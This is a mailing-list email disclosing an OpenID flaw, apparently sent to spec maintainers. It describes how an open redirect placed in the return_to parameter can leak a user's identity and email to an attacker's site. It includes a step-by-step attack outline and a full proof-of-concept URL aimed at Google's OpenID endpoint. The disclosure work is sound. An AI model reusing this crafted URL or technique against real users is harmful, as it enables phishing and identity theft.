<div dir="ltr"><div>Hi Everyone,</div><div><br></div><div>Google's Security Team suggested to ask this question here.</div><div><br></div><div>Attacker can perform the following steps:</div><div>1) Find an open redirect in some major website that leads to attacker's website (and append fragment identifier to this URL)</div>
<div>2) Craft a URL and set redirect_url to the open redirect</div><div>3) Trick the victim into visiting the URL</div><div>As the URL belongs to a major website, most likely victim will accept the RP and his identity will be leaked to attacker's site.</div>
<div><br></div><div>Here's an example (Google itself has some nice open redirects):</div><div><a href="https://www.google.com/accounts/o8/ud?openid.claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.ext0.mode=fetch_request&openid.ext0.required=email&openid.ext0.type.email=http%3A%2F%2Faxschema.org%2Fcontact%2Femail&openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.mode=checkid_setup&openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0&openid.ns.ext0=http%3A%2F%2Fopenid.net%2Fsrv%2Fax%2F1.0&openid.ns.ui=http%3A%2F%2Fspecs.openid.net%2Fextensions%2Fui%2F1.0&openid.realm=https%3A%2F%2Fwww.google.com%2F&openid.return_to=https%3A%2F%2Fwww.google.com%2Fsearch%3FbtnI%26q%3Dallinurl%253A%252F%252Flva.lv%23aaa&openid.ui.icon=true&openid.ui.lang=en-US&openid.ui.mode=popup&third_party_login=false">https://www.google.com/accounts/o8/ud?openid.claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.ext0.mode=fetch_request&openid.ext0.required=email&openid.ext0.type.email=http%3A%2F%2Faxschema.org%2Fcontact%2Femail&openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.mode=checkid_setup&openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0&openid.ns.ext0=http%3A%2F%2Fopenid.net%2Fsrv%2Fax%2F1.0&openid.ns.ui=http%3A%2F%2Fspecs.openid.net%2Fextensions%2Fui%2F1.0&openid.realm=https%3A%2F%2Fwww.google.com%2F&openid.return_to=https%3A%2F%2Fwww.google.com%2Fsearch%3FbtnI%26q%3Dallinurl%253A%252F%252Flva.lv%23aaa&openid.ui.icon=true&openid.ui.lang=en-US&openid.ui.mode=popup&third_party_login=false</a></div>
<div><br></div><div>This can even be extended so that user doesn't have to accept RP. For this attacker would have to find an open redirect that shares domain with some valid OpenID consumer (some major sites actually do this). In this case user wouldn't even notice the identity leak.</div>
<div><br></div><div>Is this only a bug in Google's OpenID implementation or a bug in the OpenID spec itself?</div><div><br></div><div>I do see the OpenID spec talking about normalization of identifiers (including removal of fragment and fragment identifier). Does the same apply to redirect_url? If not, would it be reasonable to include this in the spec?</div>
<div><br></div><div>Regards,</div><div>Andris Atteka</div><div><a href="http://andrisatteka.blogspot.com">andrisatteka.blogspot.com</a></div><div><br></div><div><br></div><div><br></div><div><br></div></div>